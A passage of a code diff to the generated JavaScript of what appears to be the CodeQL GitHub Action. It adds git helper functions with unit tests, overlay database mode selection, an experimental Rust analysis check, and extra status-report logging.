|||||||
return filePath;
|
return filePath;
|
||||||
};
|
};
|
||||||
exports.decodeGitFilePath = decodeGitFilePath;
|
exports.decodeGitFilePath = decodeGitFilePath;
|
||||||
|
/**
|
||||||
|
* Get the root of the Git repository.
|
||||||
|
*
|
||||||
|
* @param sourceRoot The source root of the code being analyzed.
|
||||||
|
* @returns The root of the Git repository.
|
||||||
|
*/
|
||||||
|
const getGitRoot = async function (sourceRoot) {
|
||||||
|
try {
|
||||||
|
const stdout = await (0, exports.runGitCommand)(sourceRoot, ["rev-parse", "--show-toplevel"], `Cannot find Git repository root from the source root ${sourceRoot}.`);
|
||||||
|
return stdout.trim();
|
||||||
|
}
|
||||||
|
catch {
|
||||||
|
// Errors are already logged by runGitCommand()
|
||||||
|
return undefined;
|
||||||
|
}
|
||||||
|
};
|
||||||
|
exports.getGitRoot = getGitRoot;
|
||||||
|
/**
|
||||||
|
* Returns the Git OIDs of all tracked files (in the index and in the working
|
||||||
|
* tree) that are under the given base path, including files in active
|
||||||
|
* submodules. Untracked files and files not under the given base path are
|
||||||
|
* ignored.
|
||||||
|
*
|
||||||
|
* @param basePath A path into the Git repository.
|
||||||
|
* @returns a map from file paths (relative to `basePath`) to Git OIDs.
|
||||||
|
* @throws {Error} if "git ls-tree" produces unexpected output.
|
||||||
|
*/
|
||||||
|
const getFileOidsUnderPath = async function (basePath) {
|
||||||
|
// Without the --full-name flag, the path is relative to the current working
|
||||||
|
// directory of the git command, which is basePath.
|
||||||
|
const stdout = await (0, exports.runGitCommand)(basePath, ["ls-files", "--recurse-submodules", "--format=%(objectname)_%(path)"], "Cannot list Git OIDs of tracked files.");
|
||||||
|
const fileOidMap = {};
|
||||||
|
// With --format=%(objectname)_%(path), the output is a list of lines like:
|
||||||
|
// 30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js
|
||||||
|
// d89514599a9a99f22b4085766d40af7b99974827_lib/git-utils.js.map
|
||||||
|
const regex = /^([0-9a-f]{40})_(.+)$/;
|
||||||
|
for (const line of stdout.split("\n")) {
|
||||||
|
if (line) {
|
||||||
|
const match = line.match(regex);
|
||||||
|
if (match) {
|
||||||
|
const oid = match[1];
|
||||||
|
const path = (0, exports.decodeGitFilePath)(match[2]);
|
||||||
|
fileOidMap[path] = oid;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
throw new Error(`Unexpected "git ls-files" output: ${line}`);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return fileOidMap;
|
||||||
|
};
|
||||||
|
exports.getFileOidsUnderPath = getFileOidsUnderPath;
|
||||||
function getRefFromEnv() {
|
function getRefFromEnv() {
|
||||||
// To workaround a limitation of Actions dynamic workflows not setting
|
// To workaround a limitation of Actions dynamic workflows not setting
|
||||||
// the GITHUB_REF in some cases, we accept also the ref within the
|
// the GITHUB_REF in some cases, we accept also the ref within the
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
71
lib/git-utils.test.js
generated
71
lib/git-utils.test.js
generated
@@ -265,4 +265,75 @@ const util_1 = require("./util");
|
|||||||
t.deepEqual(gitUtils.decodeGitFilePath('"foo\\vbar"'), "foo\vbar");
|
t.deepEqual(gitUtils.decodeGitFilePath('"foo\\vbar"'), "foo\vbar");
|
||||||
t.deepEqual(gitUtils.decodeGitFilePath('"\\a\\b\\f\\n\\r\\t\\v"'), "\x07\b\f\n\r\t\v");
|
t.deepEqual(gitUtils.decodeGitFilePath('"\\a\\b\\f\\n\\r\\t\\v"'), "\x07\b\f\n\r\t\v");
|
||||||
});
|
});
|
||||||
|
(0, ava_1.default)("getFileOidsUnderPath returns correct file mapping", async (t) => {
|
||||||
|
const runGitCommandStub = sinon
|
||||||
|
.stub(gitUtils, "runGitCommand")
|
||||||
|
.resolves("30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js\n" +
|
||||||
|
"d89514599a9a99f22b4085766d40af7b99974827_lib/git-utils.js.map\n" +
|
||||||
|
"a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96_src/git-utils.ts");
|
||||||
|
try {
|
||||||
|
const result = await gitUtils.getFileOidsUnderPath("/fake/path");
|
||||||
|
t.deepEqual(result, {
|
||||||
|
"lib/git-utils.js": "30d998ded095371488be3a729eb61d86ed721a18",
|
||||||
|
"lib/git-utils.js.map": "d89514599a9a99f22b4085766d40af7b99974827",
|
||||||
|
"src/git-utils.ts": "a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96",
|
||||||
|
});
|
||||||
|
t.deepEqual(runGitCommandStub.firstCall.args, [
|
||||||
|
"/fake/path",
|
||||||
|
["ls-files", "--recurse-submodules", "--format=%(objectname)_%(path)"],
|
||||||
|
"Cannot list Git OIDs of tracked files.",
|
||||||
|
]);
|
||||||
|
}
|
||||||
|
finally {
|
||||||
|
runGitCommandStub.restore();
|
||||||
|
}
|
||||||
|
});
|
||||||
|
(0, ava_1.default)("getFileOidsUnderPath handles quoted paths", async (t) => {
|
||||||
|
const runGitCommandStub = sinon
|
||||||
|
.stub(gitUtils, "runGitCommand")
|
||||||
|
.resolves("30d998ded095371488be3a729eb61d86ed721a18_lib/normal-file.js\n" +
|
||||||
|
'd89514599a9a99f22b4085766d40af7b99974827_"lib/file with spaces.js"\n' +
|
||||||
|
'a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96_"lib/file\\twith\\ttabs.js"');
|
||||||
|
try {
|
||||||
|
const result = await gitUtils.getFileOidsUnderPath("/fake/path");
|
||||||
|
t.deepEqual(result, {
|
||||||
|
"lib/normal-file.js": "30d998ded095371488be3a729eb61d86ed721a18",
|
||||||
|
"lib/file with spaces.js": "d89514599a9a99f22b4085766d40af7b99974827",
|
||||||
|
"lib/file\twith\ttabs.js": "a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
finally {
|
||||||
|
runGitCommandStub.restore();
|
||||||
|
}
|
||||||
|
});
|
||||||
|
(0, ava_1.default)("getFileOidsUnderPath handles empty output", async (t) => {
|
||||||
|
const runGitCommandStub = sinon
|
||||||
|
.stub(gitUtils, "runGitCommand")
|
||||||
|
.resolves("");
|
||||||
|
try {
|
||||||
|
const result = await gitUtils.getFileOidsUnderPath("/fake/path");
|
||||||
|
t.deepEqual(result, {});
|
||||||
|
}
|
||||||
|
finally {
|
||||||
|
runGitCommandStub.restore();
|
||||||
|
}
|
||||||
|
});
|
||||||
|
(0, ava_1.default)("getFileOidsUnderPath throws on unexpected output format", async (t) => {
|
||||||
|
const runGitCommandStub = sinon
|
||||||
|
.stub(gitUtils, "runGitCommand")
|
||||||
|
.resolves("30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js\n" +
|
||||||
|
"invalid-line-format\n" +
|
||||||
|
"a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96_src/git-utils.ts");
|
||||||
|
try {
|
||||||
|
await t.throwsAsync(async () => {
|
||||||
|
await gitUtils.getFileOidsUnderPath("/fake/path");
|
||||||
|
}, {
|
||||||
|
instanceOf: Error,
|
||||||
|
message: 'Unexpected "git ls-files" output: invalid-line-format',
|
||||||
|
});
|
||||||
|
}
|
||||||
|
finally {
|
||||||
|
runGitCommandStub.restore();
|
||||||
|
}
|
||||||
|
});
|
||||||
//# sourceMappingURL=git-utils.test.js.map
|
//# sourceMappingURL=git-utils.test.js.map
|
||||||
File diff suppressed because one or more lines are too long
2
lib/init-action-post-helper.js
generated
2
lib/init-action-post-helper.js
generated
@@ -173,7 +173,7 @@ async function removeUploadedSarif(uploadFailedSarifResult, logger) {
|
|||||||
logger.info(`In test mode, therefore deleting the failed analysis to avoid impacting tool status for the Action repository. SARIF ID to delete: ${sarifID}.`);
|
logger.info(`In test mode, therefore deleting the failed analysis to avoid impacting tool status for the Action repository. SARIF ID to delete: ${sarifID}.`);
|
||||||
const client = (0, api_client_1.getApiClient)();
|
const client = (0, api_client_1.getApiClient)();
|
||||||
try {
|
try {
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
// Wait to make sure the analysis is ready for download before requesting it.
|
// Wait to make sure the analysis is ready for download before requesting it.
|
||||||
await (0, util_1.delay)(5000);
|
await (0, util_1.delay)(5000);
|
||||||
// Get the analysis associated with the uploaded sarif
|
// Get the analysis associated with the uploaded sarif
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
9
lib/init-action-post.js
generated
9
lib/init-action-post.js
generated
@@ -59,14 +59,15 @@ async function runWrapper() {
|
|||||||
(0, actions_util_1.restoreInputs)();
|
(0, actions_util_1.restoreInputs)();
|
||||||
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
||||||
(0, util_1.checkGitHubVersionInRange)(gitHubVersion, logger);
|
(0, util_1.checkGitHubVersionInRange)(gitHubVersion, logger);
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
||||||
config = await (0, config_utils_1.getConfig)((0, actions_util_1.getTemporaryDirectory)(), logger);
|
config = await (0, config_utils_1.getConfig)((0, actions_util_1.getTemporaryDirectory)(), logger);
|
||||||
if (config === undefined) {
|
if (config === undefined) {
|
||||||
logger.warning("Debugging artifacts are unavailable since the 'init' Action failed before it could produce any.");
|
logger.warning("Debugging artifacts are unavailable since the 'init' Action failed before it could produce any.");
|
||||||
return;
|
|
||||||
}
|
}
|
||||||
uploadFailedSarifResult = await initActionPostHelper.run(debugArtifacts.tryUploadAllAvailableDebugArtifacts, actions_util_1.printDebugLogs, config, repositoryNwo, features, logger);
|
else {
|
||||||
|
uploadFailedSarifResult = await initActionPostHelper.run(debugArtifacts.tryUploadAllAvailableDebugArtifacts, actions_util_1.printDebugLogs, config, repositoryNwo, features, logger);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
catch (unwrappedError) {
|
catch (unwrappedError) {
|
||||||
const error = (0, util_1.wrapError)(unwrappedError);
|
const error = (0, util_1.wrapError)(unwrappedError);
|
||||||
@@ -86,7 +87,9 @@ async function runWrapper() {
|
|||||||
...uploadFailedSarifResult,
|
...uploadFailedSarifResult,
|
||||||
job_status: initActionPostHelper.getFinalJobStatus(),
|
job_status: initActionPostHelper.getFinalJobStatus(),
|
||||||
};
|
};
|
||||||
|
logger.info("Sending status report for init-post step.");
|
||||||
await (0, status_report_1.sendStatusReport)(statusReport);
|
await (0, status_report_1.sendStatusReport)(statusReport);
|
||||||
|
logger.info("Status report sent for init-post step.");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
void runWrapper();
|
void runWrapper();
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"init-action-post.js","sourceRoot":"","sources":["../src/init-action-post.ts"],"names":[],"mappings":";AAAA;;;;GAIG;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAEH,oDAAsC;AAEtC,iDAIwB;AACxB,6CAAgD;AAChD,iDAAmD;AACnD,kEAAoD;AACpD,mDAA2C;AAC3C,gFAAkE;AAClE,uCAA6C;AAC7C,6CAAkD;AAClD,mDAOyB;AACzB,iCAKgB;AAOhB,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAClC,MAAM,SAAS,GAAG,IAAI,IAAI,EAAE,CAAC;IAC7B,IAAI,MAA0B,CAAC;IAC/B,IAAI,uBAES,CAAC;IACd,IAAI,CAAC;QACH,qCAAqC;QACrC,IAAA,4BAAa,GAAE,CAAC;QAEhB,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;QAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;QAEjD,MAAM,aAAa,GAAG,IAAA,+BAAkB,EACtC,IAAA,0BAAmB,EAAC,mBAAmB,CAAC,CACzC,CAAC;QACF,MAAM,QAAQ,GAAG,IAAI,wBAAQ,CAC3B,aAAa,EACb,aAAa,EACb,IAAA,oCAAqB,GAAE,EACvB,MAAM,CACP,CAAC;QAEF,MAAM,GAAG,MAAM,IAAA,wBAAS,EAAC,IAAA,oCAAqB,GAAE,EAAE,MAAM,CAAC,CAAC;QAC1D,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;YACzB,MAAM,CAAC,OAAO,CACZ,iGAAiG,CAClG,CAAC;YACF,OAAO;QACT,CAAC;QAED,uBAAuB,GAAG,MAAM,oBAAoB,CAAC,GAAG,CACtD,cAAc,CAAC,mCAAmC,EAClD,6BAAc,EACd,MAAM,EACN,aAAa,EACb,QAAQ,EACR,MAAM,CACP,CAAC;IACJ,CAAC;IAAC,OAAO,cAAc,EAAE,CAAC;QACxB,MAAM,KAAK,GAAG,IAAA,gBAAS,EAAC,cAAc,CAAC,CAAC;QACxC,IAAI,CAAC,SAAS,CAAC,KAAK,CAAC,OAAO,CAAC,CAAC;QAE9B,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,IAAA,gCAAgB,EAAC,KAAK,CAAC,EACvB,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,EACN,KAAK,CAAC,OAAO,EACb,KAAK,CAAC,KAAK,CACZ,CAAC;QACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;YACnC,MAAM,IAAA,gCAAgB,EAAC,gBAAgB,CAAC,CAAC;QAC3C,CAAC;QACD,OAAO;IACT,CAAC;IACD,MAAM,SAAS,GAAG,oBAAoB,CAAC,iBAAiB,EAAE,CAAC;IAC3D,MAAM,CAAC,IAAI,CAAC,yBAAyB,IAAA,uCAAuB,EAAC,SAAS,CAAC,GAAG,CAAC,CAAC;IAE5E,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,SAAS,EACT,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,CACP,CAAC;IACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;QACnC,MAAM,YAAY,GAAyB;YACzC,GAAG,gBAAgB;YACnB,GAAG,uBAAuB;YAC1B,UAAU,EAAE,oBAAoB,CAAC,iBAAiB,EAAE;SACrD,CAAC;QACF,MAAM,IAAA,gCAAgB,EAAC,YAAY,CAAC,CAAC;IACvC,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
|
{"version":3,"file":"init-action-post.js","sourceRoot":"","sources":["../src/init-action-post.ts"],"names":[],"mappings":";AAAA;;;;GAIG;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAEH,oDAAsC;AAEtC,iDAIwB;AACxB,6CAAgD;AAChD,iDAAmD;AACnD,kEAAoD;AACpD,mDAA2C;AAC3C,gFAAkE;AAClE,uCAA6C;AAC7C,6CAAgD;AAChD,mDAOyB;AACzB,iCAA8E;AAO9E,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAClC,MAAM,SAAS,GAAG,IAAI,IAAI,EAAE,CAAC;IAC7B,IAAI,MAA0B,CAAC;IAC/B,IAAI,uBAES,CAAC;IACd,IAAI,CAAC;QACH,qCAAqC;QACrC,IAAA,4BAAa,GAAE,CAAC;QAEhB,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;QAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;QAEjD,MAAM,aAAa,GAAG,IAAA,6BAAgB,GAAE,CAAC;QACzC,MAAM,QAAQ,GAAG,IAAI,wBAAQ,CAC3B,aAAa,EACb,aAAa,EACb,IAAA,oCAAqB,GAAE,EACvB,MAAM,CACP,CAAC;QAEF,MAAM,GAAG,MAAM,IAAA,wBAAS,EAAC,IAAA,oCAAqB,GAAE,EAAE,MAAM,CAAC,CAAC;QAC1D,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;YACzB,MAAM,CAAC,OAAO,CACZ,iGAAiG,CAClG,CAAC;QACJ,CAAC;aAAM,CAAC;YACN,uBAAuB,GAAG,MAAM,oBAAoB,CAAC,GAAG,CACtD,cAAc,CAAC,mCAAmC,EAClD,6BAAc,EACd,MAAM,EACN,aAAa,EACb,QAAQ,EACR,MAAM,CACP,CAAC;QACJ,CAAC;IACH,CAAC;IAAC,OAAO,cAAc,EAAE,CAAC;QACxB,MAAM,KAAK,GAAG,IAAA,gBAAS,EAAC,cAAc,CAAC,CAAC;QACxC,IAAI,CAAC,SAAS,CAAC,KAAK,CAAC,OAAO,CAAC,CAAC;QAE9B,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,IAAA,gCAAgB,EAAC,KAAK,CAAC,EACvB,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,EACN,KAAK,CAAC,OAAO,EACb,KAAK,CAAC,KAAK,CACZ,CAAC;QACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;YACnC,MAAM,IAAA,gCAAgB,EAAC,gBAAgB,CAAC,CAAC;QAC3C,CAAC;QACD,OAAO;IACT,CAAC;IACD,MAAM,SAAS,GAAG,oBAAoB,CAAC,iBAAiB,EAAE,CAAC;IAC3D,MAAM,CAAC,IAAI,CAAC,yBAAyB,IAAA,uCAAuB,EAAC,SAAS,CAAC,GAAG,CAAC,CAAC;IAE5E,MAAM,gBAAgB,GAAG,MAAM,IAAA,sCAAsB,EACnD,0BAAU,CAAC,QAAQ,EACnB,SAAS,EACT,SAAS,EACT,MAAM,EACN,MAAM,IAAA,qBAAc,EAAC,MAAM,CAAC,EAC5B,MAAM,CACP,CAAC;IACF,IAAI,gBAAgB,KAAK,SAAS,EAAE,CAAC;QACnC,MAAM,YAAY,GAAyB;YACzC,GAAG,gBAAgB;YACnB,GAAG,uBAAuB;YAC1B,UAAU,EAAE,oBAAoB,CAAC,iBAAiB,EAAE;SACrD,CAAC;QACF,MAAM,CAAC,IAAI,CAAC,2CAA2C,CAAC,CAAC;QACzD,MAAM,IAAA,gCAAgB,EAAC,YAAY,CAAC,CAAC;QACrC,MAAM,CAAC,IAAI,CAAC,wCAAwC,CAAC,CAAC;IACxD,CAAC;AACH,CAAC;AAED,KAAK,UAAU,EAAE,CAAC"}
|
||||||
34
lib/init-action.js
generated
34
lib/init-action.js
generated
@@ -37,6 +37,7 @@ const fs = __importStar(require("fs"));
|
|||||||
const path = __importStar(require("path"));
|
const path = __importStar(require("path"));
|
||||||
const core = __importStar(require("@actions/core"));
|
const core = __importStar(require("@actions/core"));
|
||||||
const io = __importStar(require("@actions/io"));
|
const io = __importStar(require("@actions/io"));
|
||||||
|
const semver = __importStar(require("semver"));
|
||||||
const uuid_1 = require("uuid");
|
const uuid_1 = require("uuid");
|
||||||
const actions_util_1 = require("./actions-util");
|
const actions_util_1 = require("./actions-util");
|
||||||
const api_client_1 = require("./api-client");
|
const api_client_1 = require("./api-client");
|
||||||
@@ -49,6 +50,7 @@ const feature_flags_1 = require("./feature-flags");
|
|||||||
const init_1 = require("./init");
|
const init_1 = require("./init");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
const logging_1 = require("./logging");
|
const logging_1 = require("./logging");
|
||||||
|
const overlay_database_utils_1 = require("./overlay-database-utils");
|
||||||
const repository_1 = require("./repository");
|
const repository_1 = require("./repository");
|
||||||
const setup_codeql_1 = require("./setup-codeql");
|
const setup_codeql_1 = require("./setup-codeql");
|
||||||
const status_report_1 = require("./status-report");
|
const status_report_1 = require("./status-report");
|
||||||
@@ -158,7 +160,7 @@ async function run() {
|
|||||||
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
|
||||||
(0, util_1.checkGitHubVersionInRange)(gitHubVersion, logger);
|
(0, util_1.checkGitHubVersionInRange)(gitHubVersion, logger);
|
||||||
(0, util_1.checkActionVersion)((0, actions_util_1.getActionVersion)(), gitHubVersion);
|
(0, util_1.checkActionVersion)((0, actions_util_1.getActionVersion)(), gitHubVersion);
|
||||||
const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
|
const repositoryNwo = (0, repository_1.getRepositoryNwo)();
|
||||||
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
|
||||||
const jobRunUuid = (0, uuid_1.v4)();
|
const jobRunUuid = (0, uuid_1.v4)();
|
||||||
logger.info(`Job run UUID is ${jobRunUuid}.`);
|
logger.info(`Job run UUID is ${jobRunUuid}.`);
|
||||||
@@ -227,7 +229,12 @@ async function run() {
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
try {
|
try {
|
||||||
(0, init_1.cleanupDatabaseClusterDirectory)(config, logger);
|
const sourceRoot = path.resolve((0, util_1.getRequiredEnvParam)("GITHUB_WORKSPACE"), (0, actions_util_1.getOptionalInput)("source-root") || "");
|
||||||
|
const overlayDatabaseMode = await (0, init_1.getOverlayDatabaseMode)((await codeql.getVersion()).version, config, sourceRoot, logger);
|
||||||
|
logger.info(`Using overlay database mode: ${overlayDatabaseMode}`);
|
||||||
|
if (overlayDatabaseMode !== overlay_database_utils_1.OverlayDatabaseMode.Overlay) {
|
||||||
|
(0, init_1.cleanupDatabaseClusterDirectory)(config, logger);
|
||||||
|
}
|
||||||
if (zstdAvailability) {
|
if (zstdAvailability) {
|
||||||
await recordZstdAvailability(config, zstdAvailability);
|
await recordZstdAvailability(config, zstdAvailability);
|
||||||
}
|
}
|
||||||
@@ -345,6 +352,26 @@ async function run() {
|
|||||||
logger.info(`Setting C++ build-mode: none to ${value}`);
|
logger.info(`Setting C++ build-mode: none to ${value}`);
|
||||||
core.exportVariable(bmnVar, value);
|
core.exportVariable(bmnVar, value);
|
||||||
}
|
}
|
||||||
|
// Set CODEQL_ENABLE_EXPERIMENTAL_FEATURES for rust
|
||||||
|
if (config.languages.includes(languages_1.Language.rust)) {
|
||||||
|
const feat = feature_flags_1.Feature.RustAnalysis;
|
||||||
|
const minVer = feature_flags_1.featureConfig[feat].minimumVersion;
|
||||||
|
const envVar = "CODEQL_ENABLE_EXPERIMENTAL_FEATURES";
|
||||||
|
// if in default setup, it means the feature flag was on when rust was enabled
|
||||||
|
// if the feature flag gets turned off, let's not have rust analysis throwing a configuration error
|
||||||
|
// in that case rust analysis will be disabled only when default setup is refreshed
|
||||||
|
if ((0, actions_util_1.isDefaultSetup)() || (await features.getValue(feat, codeql))) {
|
||||||
|
core.exportVariable(envVar, "true");
|
||||||
|
}
|
||||||
|
if (process.env[envVar] !== "true") {
|
||||||
|
throw new util_1.ConfigurationError(`Experimental and not officially supported Rust analysis requires setting ${envVar}=true in the environment`);
|
||||||
|
}
|
||||||
|
const actualVer = (await codeql.getVersion()).version;
|
||||||
|
if (semver.lt(actualVer, minVer)) {
|
||||||
|
throw new util_1.ConfigurationError(`Experimental rust analysis is supported by CodeQL CLI version ${minVer} or higher, but found version ${actualVer}`);
|
||||||
|
}
|
||||||
|
logger.info("Experimental rust analysis enabled");
|
||||||
|
}
|
||||||
// Restore dependency cache(s), if they exist.
|
// Restore dependency cache(s), if they exist.
|
||||||
if ((0, caching_utils_1.shouldRestoreCache)(config.dependencyCachingEnabled)) {
|
if ((0, caching_utils_1.shouldRestoreCache)(config.dependencyCachingEnabled)) {
|
||||||
await (0, dependency_caching_1.downloadDependencyCaches)(config.languages, logger);
|
await (0, dependency_caching_1.downloadDependencyCaches)(config.languages, logger);
|
||||||
@@ -387,8 +414,7 @@ async function run() {
|
|||||||
core.exportVariable("CODEQL_EXTRACTOR_PYTHON_EXTRACT_STDLIB", "true");
|
core.exportVariable("CODEQL_EXTRACTOR_PYTHON_EXTRACT_STDLIB", "true");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
const sourceRoot = path.resolve((0, util_1.getRequiredEnvParam)("GITHUB_WORKSPACE"), (0, actions_util_1.getOptionalInput)("source-root") || "");
|
const tracerConfig = await (0, init_1.runInit)(codeql, config, sourceRoot, "Runner.Worker.exe", (0, actions_util_1.getOptionalInput)("registries"), apiDetails, overlayDatabaseMode, logger);
|
||||||
const tracerConfig = await (0, init_1.runInit)(codeql, config, sourceRoot, "Runner.Worker.exe", (0, actions_util_1.getOptionalInput)("registries"), apiDetails, logger);
|
|
||||||
if (tracerConfig !== undefined) {
|
if (tracerConfig !== undefined) {
|
||||||
for (const [key, value] of Object.entries(tracerConfig.env)) {
|
for (const [key, value] of Object.entries(tracerConfig.env)) {
|
||||||
core.exportVariable(key, value);
|
core.exportVariable(key, value);
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
34
lib/init.js
generated
34
lib/init.js
generated
@@ -35,6 +35,7 @@ var __importStar = (this && this.__importStar) || (function () {
|
|||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
exports.initCodeQL = initCodeQL;
|
exports.initCodeQL = initCodeQL;
|
||||||
exports.initConfig = initConfig;
|
exports.initConfig = initConfig;
|
||||||
|
exports.getOverlayDatabaseMode = getOverlayDatabaseMode;
|
||||||
exports.runInit = runInit;
|
exports.runInit = runInit;
|
||||||
exports.printPathFiltersWarning = printPathFiltersWarning;
|
exports.printPathFiltersWarning = printPathFiltersWarning;
|
||||||
exports.checkInstallPython311 = checkInstallPython311;
|
exports.checkInstallPython311 = checkInstallPython311;
|
||||||
@@ -43,10 +44,13 @@ const fs = __importStar(require("fs"));
|
|||||||
const path = __importStar(require("path"));
|
const path = __importStar(require("path"));
|
||||||
const toolrunner = __importStar(require("@actions/exec/lib/toolrunner"));
|
const toolrunner = __importStar(require("@actions/exec/lib/toolrunner"));
|
||||||
const io = __importStar(require("@actions/io"));
|
const io = __importStar(require("@actions/io"));
|
||||||
|
const semver = __importStar(require("semver"));
|
||||||
const actions_util_1 = require("./actions-util");
|
const actions_util_1 = require("./actions-util");
|
||||||
const codeql_1 = require("./codeql");
|
const codeql_1 = require("./codeql");
|
||||||
const configUtils = __importStar(require("./config-utils"));
|
const configUtils = __importStar(require("./config-utils"));
|
||||||
|
const git_utils_1 = require("./git-utils");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
|
const overlay_database_utils_1 = require("./overlay-database-utils");
|
||||||
const tools_features_1 = require("./tools-features");
|
const tools_features_1 = require("./tools-features");
|
||||||
const tracer_config_1 = require("./tracer-config");
|
const tracer_config_1 = require("./tracer-config");
|
||||||
const util = __importStar(require("./util"));
|
const util = __importStar(require("./util"));
|
||||||
@@ -73,7 +77,33 @@ async function initConfig(inputs, codeql) {
|
|||||||
logger.endGroup();
|
logger.endGroup();
|
||||||
return config;
|
return config;
|
||||||
}
|
}
|
||||||
async function runInit(codeql, config, sourceRoot, processName, registriesInput, apiDetails, logger) {
|
async function getOverlayDatabaseMode(codeqlVersion, config, sourceRoot, logger) {
|
||||||
|
const overlayDatabaseMode = process.env.CODEQL_OVERLAY_DATABASE_MODE;
|
||||||
|
if (overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.Overlay ||
|
||||||
|
overlayDatabaseMode === overlay_database_utils_1.OverlayDatabaseMode.OverlayBase) {
|
||||||
|
if (config.buildMode !== util.BuildMode.None) {
|
||||||
|
logger.warning(`Cannot build an ${overlayDatabaseMode} database because ` +
|
||||||
|
`build-mode is set to "${config.buildMode}" instead of "none". ` +
|
||||||
|
"Falling back to creating a normal full database instead.");
|
||||||
|
return overlay_database_utils_1.OverlayDatabaseMode.None;
|
||||||
|
}
|
||||||
|
if (semver.lt(codeqlVersion, overlay_database_utils_1.CODEQL_OVERLAY_MINIMUM_VERSION)) {
|
||||||
|
logger.warning(`Cannot build an ${overlayDatabaseMode} database because ` +
|
||||||
|
`the CodeQL CLI is older than ${overlay_database_utils_1.CODEQL_OVERLAY_MINIMUM_VERSION}. ` +
|
||||||
|
"Falling back to creating a normal full database instead.");
|
||||||
|
return overlay_database_utils_1.OverlayDatabaseMode.None;
|
||||||
|
}
|
||||||
|
if ((await (0, git_utils_1.getGitRoot)(sourceRoot)) === undefined) {
|
||||||
|
logger.warning(`Cannot build an ${overlayDatabaseMode} database because ` +
|
||||||
|
`the source root "${sourceRoot}" is not inside a git repository. ` +
|
||||||
|
"Falling back to creating a normal full database instead.");
|
||||||
|
return overlay_database_utils_1.OverlayDatabaseMode.None;
|
||||||
|
}
|
||||||
|
return overlayDatabaseMode;
|
||||||
|
}
|
||||||
|
return overlay_database_utils_1.OverlayDatabaseMode.None;
|
||||||
|
}
|
||||||
|
async function runInit(codeql, config, sourceRoot, processName, registriesInput, apiDetails, overlayDatabaseMode, logger) {
|
||||||
fs.mkdirSync(config.dbLocation, { recursive: true });
|
fs.mkdirSync(config.dbLocation, { recursive: true });
|
||||||
const { registriesAuthTokens, qlconfigFile } = await configUtils.generateRegistries(registriesInput, config.tempDir, logger);
|
